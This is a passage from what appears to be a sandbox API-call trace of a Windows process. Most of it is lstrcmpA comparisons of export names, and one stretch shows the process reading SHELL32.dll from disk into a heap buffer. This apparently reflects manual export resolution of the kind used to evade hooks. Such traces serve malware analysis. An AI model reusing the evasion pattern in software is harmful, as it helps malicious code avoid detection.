lpString2="AlpcGetHeaderSize") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.286] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0225.287] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0225.287] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0225.288] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0225.288] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0225.288] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0225.288] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0225.288] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.289] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0230.126] GetProcessHeap () returned 0x550000 [0230.126] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x4127040 | out: hHeap=0x550000) returned 1 [0230.417] GetProcessHeap () returned 0x550000 [0230.417] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569330 [0230.417] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0230.417] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0230.418] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0230.418] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0230.418] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0230.418] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0230.418] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0230.418] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0230.418] GetProcessHeap () returned 0x550000 [0230.419] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1587258) returned 0x4120040 [0230.711] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0230.711] ReadFile (in: hFile=0x140, lpBuffer=0x4120040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4120040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0238.330] CloseHandle (hObject=0x140) returned 1 [0238.331] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0238.331] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0238.331] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0238.331] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0238.331] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0238.331] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0238.332] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0238.332] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0238.332] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.332] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0238.332] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0238.332] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0238.332] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.332] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0238.332] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.332] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.333] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0238.333] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0238.333] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0238.333] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0238.333] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.333] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0238.333] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.334] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0238.334] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0238.335] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0238.335] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0238.335] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0238.335] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0238.583] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0238.584] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0238.585] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", 